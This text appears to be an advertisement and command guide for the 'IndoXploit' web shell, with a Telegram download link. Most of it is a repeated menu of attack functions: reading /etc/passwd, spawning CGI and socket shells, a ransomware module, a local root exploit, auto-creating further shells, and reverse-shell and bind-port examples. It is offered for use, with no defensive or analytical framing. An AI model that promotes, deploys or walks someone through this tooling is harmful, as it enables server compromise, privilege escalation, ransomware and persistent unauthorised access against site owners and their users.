IndoXploit-WebShell / Powerful shell
rf /etc/passwd
spawn cgitelnet1 (cgitelnet shell 1)
spawn cgitelnet2 (cgitelnet shell 2)
spawn cgipy (cgi python)
spawn soc (socket perl)
spawn rans (ransomware)
spawn adminer (adminer databese)
spawn LRE (local root exploit)
spawn fm (file manager)
spawn acs (auto create shell)
spawn phpinfo (file system info)
spawn func (php version)
Example:
rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl
Example:
rvr bp 1337 perl
Download : https://t.me/StableExploitv/216
Command :
- Read File
rf /etc/passwd
- Spawn File
spawn cgitelnet1 (cgitelnet shell 1)
spawn cgitelnet2 (cgitelnet shell 2)
spawn cgipy (cgi python)
spawn soc (socket perl)
spawn rans (ransomware)
spawn adminer (adminer databese)
spawn LRE (local root exploit)
spawn fm (file manager)
spawn acs (auto create shell)
spawn phpinfo (file system info)
spawn func (php version)
- Jumping
- Spawn File
- Spawn File
- Krdp
- Logout From Shell
- Kill Backdoor
- Reverse Shell [Backconnect]
Example:
rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl
- Bind Port
Example:
rvr bp 1337 perl
Download : https://t.me/StableExploitv/216